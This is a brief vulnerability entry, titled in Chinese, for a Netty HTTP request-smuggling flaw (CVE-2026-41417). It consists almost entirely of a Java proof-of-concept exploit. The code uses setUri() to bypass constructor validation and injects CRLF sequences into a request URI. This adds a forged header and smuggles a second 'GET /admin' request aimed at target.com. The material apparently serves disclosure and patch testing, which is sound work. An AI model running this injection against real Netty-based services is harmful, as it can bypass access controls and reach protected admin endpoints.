CVE-2026-41417 Netty请求走私漏洞

import io.netty.handler.codec.http.DefaultHttpRequest; import io.netty.handler.codec.http.HttpMethod; import io.netty.handler.codec.http.HttpVersion; public class NettyCRLFPoC { public static void main(String[] args) { // Step 1: Create a valid legitimate request object DefaultHttpRequest request = new DefaultHttpRequest( HttpVersion.HTTP_1_1, HttpMethod.GET, "/normal/path" ); // Step 2: Use setUri() to bypass the constructor's validation. // Injecting CRLF characters to split the request line and add a fake header. String maliciousUri = "/normal/path\r\nX-Injected-Header: malicious_value\r\n\r\nGET /admin HTTP/1.1\r\nHost: target.com\r\n"; request.setUri(maliciousUri); // Step 3: When this request is encoded by HttpRequestEncoder, // it will output the split line, potentially smuggling the second request. System.out.println("Request URI set to: " + request.uri()); } }